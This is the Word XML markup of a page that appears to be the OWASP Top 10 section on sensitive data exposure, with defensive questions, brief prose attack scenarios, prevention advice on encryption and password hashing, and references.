          <v:shape id="WS_polygon289" o:spid="_x0000_s2443" type="#polygon289" style="position:absolute;left:0;text-align:left;margin-left:272.6pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251857408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22C8BA3F">
          <v:shapetype id="_x0000_m2442" coordsize="1695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99DD982">
          <v:shape id="_x0000_s2441" type="#_x0000_m2442" style="position:absolute;left:0;text-align:left;margin-left:322.4pt;margin-top:439.2pt;width:169.55pt;height:.6pt;z-index:-251856384;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#3a6331" stroked="f"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6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A1B537" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB1FDE8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Sensitive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Data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Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1966A219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11655374" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="773F4FB8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52E24A17" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E41451F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39059E43" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27954EAD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25F810A0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A2926E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD86AAA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C80DA65" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="364717FA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606FB001" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37BFFC91" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B491739" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E0CC9AA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BA13E12" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D7250A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB4A4B6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201F96D0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E961FB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="374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Data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Exposure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7260D1C4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r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termin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i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</w:p>
    <w:p w14:paraId="075C4883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ensiti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oug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tr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tection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ample,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A568A40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password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red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umber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eal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cord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ersonal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6502B016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form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ou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tected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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332A1921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7"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="97"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="97"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Is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any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of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his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data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stored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in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clear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ext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long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erm,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including</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7112D85C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backup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?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B03254C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2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ansmit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lea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ext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tern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</w:p>
    <w:p w14:paraId="42BAD9C2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externally?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terne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affic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speci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ngerous.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1540B8C7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3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/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ea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ryptographic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gorithm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d?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFD60D7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4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ea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ryp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key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generated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p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key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0978FAF1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managem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ot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issing?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F9325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5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cur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iv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ead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issing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFCB0A1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wh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nsiti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vid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/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r?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F11078D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…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le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blem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void,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5B835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e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07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SVS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0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reas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09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Crypto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0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(V7),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1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Data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2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Prot.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3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(V9),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4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nd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SSL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416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(V10)</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId417" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="323232"/>
            <w:w w:val="98"/>
            <w:sz w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50CB6A24" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B3BB60" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="391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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5828129D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1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cryp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red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umb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</w:p>
    <w:p w14:paraId="145EE87B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ataba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ic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ba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cryption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owever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</w:p>
    <w:p w14:paraId="18096930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mean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cryp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ic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trieved,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C151A40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llow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Q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je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trie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red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umbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109CCB7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lea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ext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yste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ou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cryp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redit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3743C3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a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umb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ublic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key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ow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ack-end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652F895F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pplication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cryp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v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key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB5F32D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2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mp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esn’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S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</w:p>
    <w:p w14:paraId="3E3EF43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uthentic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mp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nito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etwork</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102CC1C6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raffic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(lik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p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rel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etwork)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eal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’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201274D7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ess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oki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play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oki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ijacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F192083" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="200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ssio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v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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02013B94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3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sswo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taba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sal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sh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0457452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to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veryone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ssword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ploa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ow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</w:p>
    <w:p w14:paraId="2304BF57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trie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sswo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l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salted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082D32B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hash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pos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ainbo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ecalculated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FFFB20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hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F51CBE3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200789C0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C3C4CC3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1059AFA8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB47933" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359A8A12" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04AFA7A3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61BEDC8C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="721FD9DF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AF6393F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62FEFBD4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B0FDAF7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A502599" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FBF3FC3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76FE0C3B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B281EF6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3869A8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="183A24E8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A687B7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B12A22" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="374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This?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAA2C1A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u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eril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nsaf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ryptography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S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age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</w:p>
    <w:p w14:paraId="3A6A9B71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86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>protectio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r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well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beyon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scop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of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op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10.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a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said,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DA0828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4"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>for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ll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sensitiv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data,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do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ll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of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h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following,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minimum:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1577B2A9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1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Consider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rea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you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la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t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</w:p>
    <w:p w14:paraId="2C0DC5DA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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>from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(e.g.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nsider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ttack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external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ser)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mak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sur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you</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276C0879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encryp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nsiti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s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ransi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</w:p>
    <w:p w14:paraId="768DE059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mann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fend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gains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reats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE4A0BB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="26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2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Don’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o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nsiti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nnecessarily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iscar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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF6FD13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so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ossible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you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on’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a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an’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olen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A57A542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3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Ens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ro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andar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gorithm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ro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key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</w:p>
    <w:p w14:paraId="4F6BA945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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>used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n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roper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key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managemen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lace.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Consider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7049A32A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us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1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IP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1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140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2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alidate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2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ryptographic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2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odules</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId423" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="323232"/>
            <w:w w:val="96"/>
            <w:sz w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54058010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4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Ens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assword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or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wit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gorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720EBEC0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specifical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signe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asswor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tection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u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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB8BCE4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/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bcrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>,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PBKDF2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>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42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scrypt</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId425" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="323232"/>
            <w:w w:val="96"/>
            <w:sz w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C335B75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5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Disabl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utocomple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m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llec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nsiti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a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39486F2C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an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isabl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aching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fo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page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a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ontai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sensitiv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ata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADDB265" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16118424" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="410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39071C70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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="16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16"/>
        </w:rPr>
        <w:t>-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o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ple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ments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e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DAD9D7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="191" w:lineRule="exact"/>
      </w:pPr>
      <w:hyperlink r:id="rId426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ASVS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</w:t>
      </w:r>
      <w:hyperlink r:id="rId427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req’ts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</w:t>
      </w:r>
      <w:hyperlink r:id="rId428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on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</w:t>
      </w:r>
      <w:hyperlink r:id="rId429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Cryptography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</w:t>
      </w:r>
      <w:hyperlink r:id="rId430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(V7),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</w:t>
      </w:r>
      <w:hyperlink r:id="rId431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Data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</w:t>
      </w:r>
      <w:hyperlink r:id="rId432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Protection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</w:t>
      </w:r>
      <w:hyperlink r:id="rId433" w:history="1">
        <w:r w:rsidR="00810992">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="3A6331"/>
            <w:w w:val="95"/>
            <w:sz w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>(V9)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E3EF30" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
      </w:pPr>
      <w:hyperlink r:id="rId434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mmunication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3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36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10)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="315BD55C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3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3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ryptographic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3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torag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2B150ADB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asswor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torag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614E44A1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ranspor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4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Lay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otec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12ABC2DC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Tes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Guide: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hapt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SL/TL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</w:p>
    <w:p w14:paraId="625F3AC0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="332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7A5DC6DE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="30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310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ryptographic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5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ssues</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AA31ACC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86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>·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0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1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2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312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3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4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Cleartext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5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Storage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6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of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7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Sensitive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468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Information</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E47F087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W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6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319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leartex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ransmiss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nsitive</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08E364F4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
      </w:pPr>
      <w:hyperlink r:id="rId476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Information</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="16A4AC6D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7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326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8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8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Weak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8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cryption</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46778586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724A3ACC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="13"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="24BE8B23" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="39AE639D">
          <v:shape id="_x0000_s2439" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:73.65pt;width:570pt;height:229.9pt;z-index:251675136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2ACA19C4" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="1016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18E2FE55" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="30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FFFFFF"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="19"/>
                          </w:rPr>
                          <w:t>y</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5743B12F" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="478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5AF13BA7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738A5EDD" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="511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1E664564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5480BF9B" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="522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6A437293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388F665E" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="563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7056EC60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51B722F9" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="510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79C58D49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31CC1E13" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="639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64B2B94" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="437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2CD38929" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="317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4A41ACCE" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="69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548F3C8B" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="317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161274F1" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="47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COMM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5D1D1039" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="317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3F045045" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="5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238840AF" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="317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3D263657" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="42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DFF8D5B" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="317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4FDECF86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32040D3E" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="234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EAA82EF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on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ith</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="6E6E085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etwor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</w:p>
                      <w:p w14:paraId="0E4261F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23B45C41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5943ED3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quest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</w:p>
                      <w:p w14:paraId="1DEF913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onymou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</w:p>
                      <w:p w14:paraId="0AA30D6E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ivate</w:t>
                        </w:r>
                      </w:p>
